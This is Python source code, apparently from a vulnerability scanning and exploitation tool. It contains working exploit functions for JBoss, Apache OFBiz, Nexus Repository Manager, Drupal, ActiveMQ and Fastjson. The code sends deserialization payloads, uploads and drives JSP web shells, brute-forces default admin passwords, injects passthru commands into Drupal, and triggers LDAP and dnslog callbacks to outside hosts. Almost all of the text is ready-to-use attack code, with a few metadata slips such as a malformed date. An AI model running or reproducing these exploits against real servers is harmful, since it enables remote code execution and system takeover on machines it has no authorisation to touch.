self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-1428"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "JBoss WEB 控制台安全验证绕过漏洞"
self.vul_info["vul_numb"] = "CVE-2010-1428"
self.vul_info["vul_apps"] = "JBoss"
self.vul_info["vul_date"] = "2010-04-19"
self.vul_info["vul_vers"] = "4.2.0 - 4.3.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件上传"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "JBoss企业应用平台中存在多个非授权访问漏洞,远程用户可以绕过认证执行非授权操作或读取敏感信息。"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
self.path = "/web-console/Invoker"
md = random_md5()
cmd = "echo " + md
# self.data = ":-)"
bad = "20" + md
try:
self.req = requests.head(self.url + self.path,
data=self.payload_cve_2010_1428,
headers=self.headers,
timeout=self.timeout,
verify=False)
time.sleep(0.5)
self.cmd = urlencode({"ppp": cmd})
self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" +
self.cmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.head(self.url + self.path,
data=self.payload_cve_2010_1428,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.cmd = urlencode({"ppp": cmd})
self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" +
self.cmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(self.request.text, md):
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = self.url + self.path
self.vul_info[
"prt_info"] = "[web-console] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_26295_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution"
self.vul_info["vul_numb"] = "CVE-2021-26295"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2021-03-25"
self.vul_info["vul_vers"] = "< 17.12.06"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Arbitrary Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。" \
"攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器."
self.vul_info["cre_date"] = "2021-03-31"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': 'text/xml',
'Connection': 'close'
}
def _trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
def dnslog_re(md):
headers_dnslog = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
'Host': 'www.dnslog.cn',
'Cookie':
'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
'Accept': '*/*',
'Referer': 'http://www.dnslog.cn/',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
dnslog_url = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231"
dns = requests.get(dnslog_url,
headers=headers_dnslog,
timeout=10,
verify=False)
if md in dns.text:
return md
try:
headers_dnslog = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Host': 'www.dnslog.cn',
'Cookie':
'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
'Accept': '*/*',
'Referer': 'http://www.dnslog.cn/',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
dns = requests.post(dnslog_api,
headers=headers_dnslog,
timeout=10,
verify=False)
dns = dns.text
dns_data = bytes(dns, encoding="utf8")
dns_hex = _trans(dns_data)
data = self.payload_cve_2021_26295_poc.replace(
"RECOMMAND", dns_hex)
url = urljoin(self.url, "/webtools/control/SOAPService")
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dnslog_re(dns):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2015_7501_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "RedHat JBoss: CVE-2015-7501"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "JBoss 反序列化远程命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2015-7501"
self.vul_info["vul_apps"] = "JBoss"
self.vul_info["vul_date"] = "2015-11-15"
self.vul_info["vul_vers"] = "5.x, 6.x"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程命令执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "此漏洞主要是由于JBoss中invoker/JMXInvokerServlet路径对外开放,由于JBoss的jmx组件支" \
"持Java反序列化,并且在反序列化过程中没有加入有效的安全检测机制," \
"导致攻击者可以传入精心构造好的恶意序列化数据,在jmx对其进行反序列化处理时," \
"导致传入的携带恶意代码的序列化数据执行,造成反序列化漏洞"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
self.path = "/invoker/JMXInvokerServlet"
self.data = ":-)"
md = random_md5()
cmd = "echo " + md
bad = "20" + md
try:
self.request = requests.post(self.url + self.path,
data=self.payload_cve_2015_7501,
headers=self.headers,
timeout=self.timeout,
verify=False)
time.sleep(0.5)
self.cmd = urlencode({"ppp": cmd})
self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
self.cmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + self.path,
data=self.payload_cve_2015_7501,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.cmd = urlencode({"ppp": cmd})
self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
self.cmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in self.request.text:
if md in misinformation(self.request.text, md):
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = self.url + self.path
self.vul_info[
"prt_info"] = "[JMXInvokerServlet] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_10199_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2020-10199"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2020-10199"
self.vul_info["vul_apps"] = "Nexus"
self.vul_info["vul_date"] = "20120-04-01"
self.vul_info["vul_vers"] = "3.x <= 3.21.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当," \
"导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 "
self.vul_info["cre_date"] = "2021-01-27"
self.vul_info["cre_auth"] = "zhzyker"
self.session_headers = {
'Connection': 'keep-alive',
'X-Requested-With': 'XMLHttpRequest',
'X-Nexus-UI': 'true',
'User-Agent': self.ua
}
md = random_md5()
cmd = "echo " + md
try:
self.us = base64.b64encode(str.encode("admin"))
self.pa = base64.b64encode(str.encode("admin"))
self.base64user = self.us.decode('ascii')
self.base64pass = self.pa.decode('ascii')
self.session_data = {
'username': self.base64user,
'password': self.base64pass
}
self.request = requests.post(self.url + "/service/rapture/session",
data=self.session_data,
headers=self.session_headers,
timeout=20)
self.session_str = str(self.request.headers)
self.session = (re.search(r"NXSESSIONID=(.*); Path",
self.session_str).group(1))
self.rce_headers = {
'Connection': "keep-alive",
'NX-ANTI-CSRF-TOKEN': "0.6153568974227819",
'X-Requested-With': "XMLHttpRequest",
'X-Nexus-UI': "true",
'Content-Type': "application/json",
'404': "" + cmd + "",
'User-Agent': self.ua,
'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \
"NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + ""
}
request = requests.post(self.url +
"/service/rest/beta/repositories/go/group",
data=self.payload_cve_2020_10199,
headers=self.rce_headers)
if md in request.text:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = cmd
self.vul_info[
"prt_info"] = "[rce] [admin:admin] [payload: " + cmd + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2018_7602_exp(self, cmd):
vul_name = "Drupal: CVE-2018-7602"
DRUPAL_U = "admin"
DRUPAL_P = "admin"
try:
self.session = requests.Session()
self.get_params = {'q': 'user/login'}
self.post_params = {
'form_id': 'user_login',
'name': DRUPAL_U,
'pass': DRUPAL_P,
'op': 'Log in'
}
self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.get_params = {'q': 'user'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.user_id = self.soup.find('meta', {
'property': 'foaf:name'
}).get('about')
if "?q=" in self.user_id:
self.user_id = self.user_id.split("=")[1]
self.get_params = {'q': self.user_id + '/cancel'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_token = self.form.find('input', {
'name': 'form_token'
}).get('value')
self.get_params = {
'q':
self.user_id + '/cancel',
'destination':
self.user_id +
'/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
+ cmd
}
self.post_params = {
'form_id': 'user_cancel_confirm_form',
'form_token': self.form_token,
'_triggering_element_name': 'form_id',
'op': 'Cancel account'
}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_build_id = self.form.find('input', {
'name': 'form_build_id'
}).get('value')
self.get_params = {
'q':
'file/ajax/actions/cancel/#options/path/' + self.form_build_id
}
self.post_params = {'form_build_id': self.form_build_id}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
verify.exploit_print(self.r.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2016_3088_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2016-3088"
self.vul_info["vul_apps"] = "AcitveMQ"
self.vul_info["vul_date"] = "2016-03-10"
self.vul_info["vul_vers"] = "< 5.14.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
self.vul_info["cre_date"] = "2021-01-07"
self.vul_info["cre_auth"] = "zhzyker"
self.rawdata = None
self.path = "null"
self.name = random_md5()[:-20]
self.webshell = "/" + self.name + ".jsp"
self.poc = random_md5()
self.exp = self.jsp_webshell
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
try:
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
self.request = requests.get(
self.url + "/admin/test/systemProperties.jsp",
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.request.status_code == 200:
self.path = \
re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
break
except IndexError:
pass
self.request = requests.put(self.url + "/fileserver/v.txt",
headers=self.headers_base64,
data=self.poc,
timeout=self.timeout,
verify=False)
self.headers_move = {
'User-Agent':
self.ua,
'Destination':
'file://' + self.path + '/webapps/api' + self.webshell
}
self.request = requests.request("MOVE",
self.url + "/fileserver/v.txt",
headers=self.headers_move,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + "/api" + self.webshell,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.poc in self.request.text:
self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
self.vul_info[
"prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson_1247_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.47"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "null"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2019-07-15"
self.vul_info["vul_vers"] = "<= 1.2.47"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。"
self.vul_info["cre_date"] = "2021-01-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': "application/json",
'Connection': 'close'
}
md = dns_request()
dns = md
data = {
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://" + dns + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
